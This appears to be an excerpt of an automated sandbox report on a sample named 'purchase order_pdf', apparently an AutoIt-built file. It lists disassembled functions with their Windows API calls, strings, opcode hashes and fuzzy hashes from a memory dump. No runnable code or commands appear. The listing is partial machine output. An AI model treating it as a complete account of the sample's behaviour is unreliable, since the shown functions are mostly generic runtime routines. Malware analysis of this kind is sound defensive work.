Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 8d5759937e4d52862c958b7b25229403f6e766e19416cd77c35fa27cc8730d8e
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 61017E3204418EBBDF125E88CC019EE3F66FF1A344F088515FA1998431D236C9B1BB81

Function 008FB57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 008FB59E
ScreenToClient.USER32(?,?), ref: 008FB5B6
ScreenToClient.USER32(?,?), ref: 008FB5DA
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 008FB5F5

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 5ad5e0c010a1597ae6aca1b368b4534f09a060f2b673a86dec47bfa39323a372
Instruction ID: eb3f26e9640ffff4e212a8f11c3a38682e7ef7249d5e1cd903c63c5acaf5630e
Opcode Fuzzy Hash: 5ad5e0c010a1597ae6aca1b368b4534f09a060f2b673a86dec47bfa39323a372
Instruction Fuzzy Hash: CC1134B9D00209EFDB41CFA9C4849EEBBB5FF18310F104166E914E2220D735AA55CF50

Function 008FB8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 008FB8FE
_memset.LIBCMT ref: 008FB90D
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00937F20,00937F64), ref: 008FB93C
CloseHandle.KERNEL32 ref: 008FB94E

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 1a753130c39d57c09cdcc588cb2bffb3c9abf34fd1fbd62589d5de00d9d78e65
Instruction ID: d22ca8812f5310b50eb74981d38adb97dc893c8f9d6d5a4a9c06f516e2111f5c
Opcode Fuzzy Hash: 1a753130c39d57c09cdcc588cb2bffb3c9abf34fd1fbd62589d5de00d9d78e65
Instruction Fuzzy Hash: 47F05EF26583047BE62027B5AC05FBBBA9CFB08354F040020FB08E5292D7714910DBA9

Function 008D6E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 008D6E88

Part of subcall function 008D794E: _memset.LIBCMT ref: 008D7983

_memmove.LIBCMT ref: 008D6EAB
_memset.LIBCMT ref: 008D6EB8
LeaveCriticalSection.KERNEL32(?), ref: 008D6EC8

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 58f22a45e85e5615a131b3e2a320d92c46f82fb799cb2885a7e65109e6d0049b
Instruction ID: 375c196ad2988aab20bca83cb3dcb5065a4c9b04c4b00bce4f1ab51a1dec4901
Opcode Fuzzy Hash: 58f22a45e85e5615a131b3e2a320d92c46f82fb799cb2885a7e65109e6d0049b
Instruction Fuzzy Hash: 35F0543A104200BBCF016F55DC85E59BB29FF45321B088065FE089E21BD731A911CBB5

Function 008FC00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 008712F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0087134D
Part of subcall function 008712F3: SelectObject.GDI32(?,00000000), ref: 0087135C
Part of subcall function 008712F3: BeginPath.GDI32(?), ref: 00871373
Part of subcall function 008712F3: SelectObject.GDI32(?,00000000), ref: 0087139C

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 008FC030
LineTo.GDI32(00000000,?,?), ref: 008FC03D
EndPath.GDI32(00000000), ref: 008FC04D
StrokePath.GDI32(00000000), ref: 008FC05B

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 8c82ccf6e35a4bc46ce14e7928a1d011f38de86b63438dc35cdeeccf1a440dfa
Instruction ID: 4e7f262290c36759b22027d44d5c1a76ec1148c5a931eaacf7e0708f2a4b6cda
Opcode Fuzzy Hash: 8c82ccf6e35a4bc46ce14e7928a1d011f38de86b63438dc35cdeeccf1a440dfa
Instruction Fuzzy Hash: C2F05E3100565DBBDB126F64AC09FEE3F59BF4A311F048010FB11A11E28B755651DF99

Function 008CA37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 008CA399
GetWindowThreadProcessId.USER32(?,00000000), ref: 008CA3AC
GetCurrentThreadId.KERNEL32 ref: 008CA3B3
AttachThreadInput.USER32(00000000), ref: 008CA3BA

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 51095f5e5c00ad5775665aefbbab98ecbb89aa24f95fefa215173e9bb66fbd82
Instruction ID: 6a62e6caa11c08d5637a32376b0cea8709f7efd83c9cca09ae7cc27e1dfdd450
Opcode Fuzzy Hash: 51095f5e5c00ad5775665aefbbab98ecbb89aa24f95fefa215173e9bb66fbd82
Instruction Fuzzy Hash: EEE01531141268BADB201BB2DC0CFE73E2CFF267A5F008028BA09C81A1CA75C940CBA0

Function 00872218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00872231
SetTextColor.GDI32(?,000000FF), ref: 0087223B
SetBkMode.GDI32(?,00000001), ref: 00872250
GetStockObject.GDI32(00000005), ref: 00872258
GetWindowDC.USER32(?,00000000), ref: 008AC0D3
GetPixel.GDI32(00000000,00000000,00000000), ref: 008AC0E0
GetPixel.GDI32(00000000,?,00000000), ref: 008AC0F9
GetPixel.GDI32(00000000,00000000,?), ref: 008AC112
GetPixel.GDI32(00000000,?,?), ref: 008AC132
ReleaseDC.USER32(?,00000000), ref: 008AC13D

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 114486c89a02d6cfa10e2430d353784b6c700bb8b069370c82b3572925e15820
Instruction ID: da83119ebb3a09fa751d013bc9d19ba2745f426282863ee5ce8b8e84a6395449
Opcode Fuzzy Hash: 114486c89a02d6cfa10e2430d353784b6c700bb8b069370c82b3572925e15820
Instruction Fuzzy Hash: D1E0C031504544EAEB215F74EC49BE87B14FB15336F148366FB69980E687728590DB21

Function 008C8C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 008C8C63
OpenThreadToken.ADVAPI32(00000000,?,?,?,008C882E), ref: 008C8C6A
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,008C882E), ref: 008C8C77
OpenProcessToken.ADVAPI32(00000000,?,?,?,008C882E), ref: 008C8C7E

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 169c341ced13389e949f772f20d48f9019f028290a4bf1af3b689556e468045c
Instruction ID: 1dbbc85640cab0b080d604ed11c175311a72e38f5a086947b1a017a788da914d
Opcode Fuzzy Hash: 169c341ced13389e949f772f20d48f9019f028290a4bf1af3b689556e468045c
Instruction Fuzzy Hash: 7BE04F36642311DBD7605FB16D0CF663BA8FF50792F084838A345C9041EA348441CB61

Function 008B2187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 008B2187
GetDC.USER32(00000000), ref: 008B2191
GetDeviceCaps.GDI32(00000000,0000000C), ref: 008B21B1
ReleaseDC.USER32(?), ref: 008B21D2

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: a1e64252013a7c7955e6555ff6ddb76c7339b8a700338b6a47baf4ba170d4903
Instruction ID: 53c809a0fdf98f9686b4cc6f537d4f6bf3ebfee83bd979ae179b6a1a424e4a12
Opcode Fuzzy Hash: a1e64252013a7c7955e6555ff6ddb76c7339b8a700338b6a47baf4ba170d4903
Instruction Fuzzy Hash: D5E0C275800618AFDB019F74C848AAD7BB1FF58350F108429EA5AD7221CB389141DF50

Function 008B219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 008B219B
GetDC.USER32(00000000), ref: 008B21A5
GetDeviceCaps.GDI32(00000000,0000000C), ref: 008B21B1
ReleaseDC.USER32(?), ref: 008B21D2

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 437a61414316b7c08c7f5471a7bfa0638706c778799bb7c40e75c70cbdc2fd13
Instruction ID: f8fb2dc4886e9838587a07575161f18c590e10881069980a4c05959c1407261d
Opcode Fuzzy Hash: 437a61414316b7c08c7f5471a7bfa0638706c778799bb7c40e75c70cbdc2fd13
Instruction Fuzzy Hash: A4E0C275800204AFCB019F748848AAD7AA1FF58350B108029EA5AD7221CB389141DF50

Function 008CB7B6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 008CB981

Strings

AutoIt3GUI, xrefs: 008CB8F9
Container, xrefs: 008CB8FE

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 1e770d8fe764ee3776b4981e0118018e078f378f88a6dae276be98392207791c
Instruction ID: cf737c2e0ecfe13e65fd92da4c073ffd740251997aaf2ea32b6d89b2336b894b
Opcode Fuzzy Hash: 1e770d8fe764ee3776b4981e0118018e078f378f88a6dae276be98392207791c
Instruction Fuzzy Hash: 32913970600A119FDB24DF68C885F6ABBF8FF48710F14856EE94ACB691DB70E840CB51

Function 008DB217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 0088FEC6: _wcscpy.LIBCMT ref: 0088FEE9

Part of subcall function 00879997: __itow.LIBCMT ref: 008799C2
Part of subcall function 00879997: __swprintf.LIBCMT ref: 00879A0C

__wcsnicmp.LIBCMT ref: 008DB298
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 008DB361

Strings

LPT, xrefs: 008DB292

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: d2ba5729fb9e52eed86958608fb1b6b3233eb4d55f6e448e1790d217ae506c1c
Instruction ID: 99cd0f91d0e3a8845d01fb4a86290e0d841fcd0c7f88b0b9fd89b572fb27e89e
Opcode Fuzzy Hash: d2ba5729fb9e52eed86958608fb1b6b3233eb4d55f6e448e1790d217ae506c1c
Instruction Fuzzy Hash: 0D613F75A00219EFCB18EB98C885EAEB7F4FB48310F15816AF546EB351DB70AE40DB51

Function 00882AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00882AC8
GlobalMemoryStatusEx.KERNEL32(?), ref: 00882AE1

Strings

@, xrefs: 00882AD5

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 6e4c3d3cf2a55f04f3152e71162526a23165b7436fa0457816fe5bef3dc5fa5c
Instruction ID: 5260eb8b3dd3a37f83411417c966599b8f6a420cfe71f3ea89fc1103883c64a1
Opcode Fuzzy Hash: 6e4c3d3cf2a55f04f3152e71162526a23165b7436fa0457816fe5bef3dc5fa5c
Instruction Fuzzy Hash: E65157715287449BE320AF14D886BAFBBF8FF84310F42885DF1D9810A5DB308569CB27

Function 008D99BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 0087506B: __fread_nolock.LIBCMT ref: 00875089

_wcscmp.LIBCMT ref: 008D9AAE
_wcscmp.LIBCMT ref: 008D9AC1

Strings

FILE, xrefs: 008D99FA

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 968b7195e71e247e4be58dd70ff3dca689eb9d4a1d69ce5224b0c27b425b3ea8
Instruction ID: 6c42a66711ff9eafd3821d9c19117db4afff9985816839b9c778d637b83a3a1b
Opcode Fuzzy Hash: 968b7195e71e247e4be58dd70ff3dca689eb9d4a1d69ce5224b0c27b425b3ea8
Instruction Fuzzy Hash: F541E671A00619BADF209AA4DC45FEFBBBDEF45714F01407AF904F7285D6719E0487A2

Function 008E2882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 008E2892
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 008E28C8

Strings

|, xrefs: 008E2899

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: df772a1661eea2230b2b78c068542e0f066ddc1dcb9c65d57c1c930dccb8fc2c
Instruction ID: f47009632687c7682ac2ec09589b15d0240b8733e6b9d37527f8c2802eaef62f
Opcode Fuzzy Hash: df772a1661eea2230b2b78c068542e0f066ddc1dcb9c65d57c1c930dccb8fc2c
Instruction Fuzzy Hash: 9E311971800119AFCF01EFA5CC85EEEBFB9FF09300F144029F819E6166DA319A56DBA1

Function 008F6CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 008F6D86
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 008F6DC2

Strings

static, xrefs: 008F6D22

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: ff50b0a98b93bb3faa69273617c4f4ed98b7ded28d2483b4de577025deeb7ac5
Instruction ID: f6c2274bb2b9605e87413fa723556362730f11524ddc91a9e6cc497d1f9b3e7c
Opcode Fuzzy Hash: ff50b0a98b93bb3faa69273617c4f4ed98b7ded28d2483b4de577025deeb7ac5
Instruction Fuzzy Hash: 2E314F71210608AADB109F78CC40AFB77B9FF48764F108619FAA9D7191DA71AC91DB60

Function 008D2D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 008D2E00
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 008D2E3B

Strings

0, xrefs: 008D2DF9

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 2a6b6fdc6dc22d2d811d5cc6aa68a33b8de23d05a188a9546ccca3593ff2b4b8
Instruction ID: 233917e245dbce6d8a66379f2b6be5fcc2e38dc741b274e290dc62da6ba3631c
Opcode Fuzzy Hash: 2a6b6fdc6dc22d2d811d5cc6aa68a33b8de23d05a188a9546ccca3593ff2b4b8
Instruction Fuzzy Hash: 2F31E631600309ABEB24DF58C885BAEBBF9FF55350F14462BE985E73A2D7709940CB51

Function 008F6943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 008F69D0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 008F69DB

Strings

Combobox, xrefs: 008F699D

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 298872201837265d1d2f6463d7ce408c383a5ebe69f3301e04069233847cd218
Instruction ID: 4d13c9c9a853f9615bce648cc5bf60241869592d43e2dc56b4524f90e0c74a10
Opcode Fuzzy Hash: 298872201837265d1d2f6463d7ce408c383a5ebe69f3301e04069233847cd218
Instruction Fuzzy Hash: D711937170020C6FEF119E24CC80EBB3BAAFB953A4F114224FA58D7291E6B19C6187A0

Function 008F6E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00871D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00871D73
Part of subcall function 00871D35: GetStockObject.GDI32(00000011), ref: 00871D87
Part of subcall function 00871D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00871D91

GetWindowRect.USER32(00000000,?), ref: 008F6EE0
GetSysColor.USER32(00000012), ref: 008F6EFA

Strings

static, xrefs: 008F6EBD

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

